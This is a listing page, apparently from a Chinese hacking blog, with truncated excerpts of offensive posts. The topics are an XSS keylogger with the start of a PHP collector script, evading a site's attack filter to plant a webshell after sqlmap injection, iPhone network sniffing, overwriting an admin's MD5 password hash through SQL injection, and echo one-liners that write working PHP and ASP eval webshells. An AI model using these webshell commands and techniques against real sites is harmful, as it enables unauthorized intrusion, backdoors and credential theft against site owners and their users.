-
XSS的键盘记录
这种方法是非常公开的,但很多人仍然不知道它。cookie时,从目标不能重复使用,您可以使用此方法。 你需要一台主机上传: g.php <?php$Keylog = $_GET["c"];$reffer = $_SE...
-
webshell如果躲过“加速乐黑客攻击拦截”
今天检查一个网站,如下过程,记录分享一下。 1、访问网站,发现有搜索功能 2、sqlmap 注入试试,成功,mysql,root权限 3、破解root密码,失败 4、写webshell,失败(windows,不知道网站物理路径) 5、扫描...
-
iphone嗅探电脑
拿着手机除了看电影,新网。就没什么事干了。据说Iphone能嗅探,于是自己去实践了。看了下效果,挺满意的。-所使用到工具-Iphone:Pirni(重要.在Caydia下载安装), Fing,SSH TerminalPc:Wireshark...
-
SQL注入直接修改管理员密码的MD5值
经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?新方法,直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)测试如下:http://w...
-
cmd生成一句话命令
linux:echo -e “<?@include(\\$_POST[“c”]);?>” > 1.php 会再同目录下生成1.php一句话 密码:cwin: echo ^<%eval request(“c”)%^&g...
